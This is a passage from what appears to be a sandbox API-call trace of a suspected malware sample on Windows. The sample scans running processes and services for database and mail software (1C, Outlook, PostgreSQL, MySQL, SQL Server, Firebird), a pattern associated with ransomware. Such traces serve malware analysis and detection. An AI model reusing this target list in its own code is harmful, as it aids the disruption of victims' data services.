(lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0256.321] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0256.321] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0256.321] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.321] lstrlenW (lpString="csrss.exe") returned 9 [0256.321] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0256.321] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0256.321] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0256.321] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0256.322] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0256.322] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0256.322] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0256.322] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0256.322] lstrlenW (lpString="wininit.exe") returned 11 [0256.322] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0256.322] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0256.322] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0256.322] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0256.322] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0256.322] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0256.322] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0256.322] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.322] lstrlenW (lpString="csrss.exe") returned 9 [0256.322] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0256.322] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0256.322] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0256.322] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0256.322] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0256.322] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0256.322] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0256.323] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0256.323] lstrlenW (lpString="winlogon.exe") returned 12 [0256.323] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0256.323] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0256.323] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0256.323] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0256.323] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0256.323] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0256.323] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0256.323] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0256.323] lstrlenW (lpString="services.exe") returned 12 [0256.323] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0256.323] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0256.323] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0256.323] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0256.323] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0256.323] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0256.323] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0256.323] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0256.324] lstrlenW (lpString="lsass.exe") returned 9 [0256.324] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0256.324] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0256.324] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0256.324] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0256.324] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0256.324] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0256.324] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0256.324] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0256.324] lstrlenW (lpString="lsm.exe") returned 7 [0256.324] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0256.324] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0256.324] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0256.324] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0256.324] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0256.324] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0256.324] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0256.324] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.325] lstrlenW (lpString="svchost.exe") returned 11 [0256.325] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0256.325] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0256.325] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0256.325] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0256.325] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0256.325] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0256.325] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0256.325] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.325] lstrlenW (lpString="svchost.exe") returned 11 [0256.325] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0256.325] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0256.325] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0256.325] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0256.325] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0256.325] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0256.325] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0256.325] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.326] lstrlenW (lpString="svchost.exe") returned 11 [0256.326] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0256.326] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0256.326] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0256.326] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0256.326] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0256.326] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0256.326] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0256.326] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.326] lstrlenW (lpString="svchost.exe") returned 11 [0256.326] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0256.326] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0256.326] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0256.326] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0256.326] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0256.326] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.327] lstrlenW (lpString="svchost.exe") returned 11 [0256.327] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0256.327] lstrlenW (lpString="audiodg.exe") returned 11 [0256.327] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.327] lstrlenW (lpString="svchost.exe") returned 11 [0256.327] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.328] lstrlenW (lpString="svchost.exe") returned 11 [0256.328] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0256.328] lstrlenW (lpString="userinit.exe") returned 12 [0256.328] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0256.328] lstrlenW (lpString="dwm.exe") returned 7 [0256.328] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.328] lstrlenW (lpString="explorer.exe") returned 12 [0256.328] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0256.329] lstrlenW (lpString="spoolsv.exe") returned 11 [0256.329] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0256.329] lstrlenW (lpString="taskhost.exe") returned 12 [0256.329] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.329] lstrlenW (lpString="svchost.exe") returned 11 [0256.329] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0256.329] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0256.330] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0256.330] lstrlenW (lpString="reader_sl.exe") returned 13 [0256.330] Process32NextW (in: hSnapshot=0x208, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0256.330] CloseHandle (hObject=0x208) returned 1 [0256.330] Sleep (dwMilliseconds=0x1f4) [0256.957] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea2b8 [0256.990] EnumServicesStatusExW (in: hSCManager=0x47ea2b8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0256.990] GetLastError () returned 0xea [0256.990] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xcec) returned 0x3dec5a0 [0256.990] EnumServicesStatusExW (in: hSCManager=0x47ea2b8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xcec, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0256.990] CloseServiceHandle (hSCObject=0x47ea2b8) returned 1 [0256.990] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0256.990] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0256.990] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0256.990] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0256.990] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0256.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0256.991] lstrlenW (lpString="AudioSrv") returned 8 [0256.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0256.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0256.991] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0256.991] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0256.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0256.991] lstrlenW (lpString="BFE") returned 3 [0256.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0256.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0256.991] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0256.991] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0256.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0256.991] lstrlenW (lpString="CryptSvc") returned 8 [0256.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0256.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0256.991] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0256.991] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0256.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0256.991] lstrlenW (lpString="CscService") returned 10 [0256.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0256.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0256.991] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0256.991] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0256.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0256.991] lstrlenW (lpString="DcomLaunch") returned 10 [0256.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0256.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0256.991] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0256.991] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0256.991] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0256.991] lstrlenW (lpString="Dhcp") returned 4 [0256.991] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0256.991] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0256.991] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0256.992] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0256.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0256.992] lstrlenW (lpString="Dnscache") returned 8 [0256.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0256.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0256.992] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0256.992] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0256.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0256.992] lstrlenW (lpString="DPS") returned 3 [0256.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0256.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0256.992] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0256.992] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0256.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0256.992] lstrlenW (lpString="eventlog") returned 8 [0256.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0256.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0256.992] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0256.992] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0256.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0256.992] lstrlenW (lpString="EventSystem") returned 11 [0256.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0256.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0256.992] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0256.992] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0256.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0256.992] lstrlenW (lpString="gpsvc") returned 5 [0256.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0256.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0256.992] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0256.992] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0256.992] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0256.992] lstrlenW (lpString="LanmanWorkstation") returned 17 [0256.992] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0256.992] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0256.993] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0256.993] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0256.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0256.993] lstrlenW (lpString="lmhosts") returned 7 [0256.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0256.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0256.993] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0256.993] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0256.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0256.993] lstrlenW (lpString="MMCSS") returned 5 [0256.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0256.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0256.993] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0256.993] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0256.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0256.993] lstrlenW (lpString="MpsSvc") returned 6 [0256.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0256.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0256.993] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0256.993] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0256.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0256.993] lstrlenW (lpString="NlaSvc") returned 6 [0256.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0256.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0256.993] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0256.993] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0256.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0256.993] lstrlenW (lpString="nsi") returned 3 [0256.993] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0256.993] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0256.993] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0256.993] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0256.993] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0256.993] lstrlenW (lpString="PcaSvc") returned 6 [0256.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0256.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0256.994] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0256.994] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0256.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0256.994] lstrlenW (lpString="PlugPlay") returned 8 [0256.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0256.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0256.994] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0256.994] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0256.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0256.994] lstrlenW (lpString="Power") returned 5 [0256.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0256.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0256.994] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0256.994] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0256.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0256.994] lstrlenW (lpString="ProfSvc") returned 7 [0256.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0256.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0256.994] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0256.994] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0256.994] lstrcmpiW (lpString1="sqlserveradhelper", 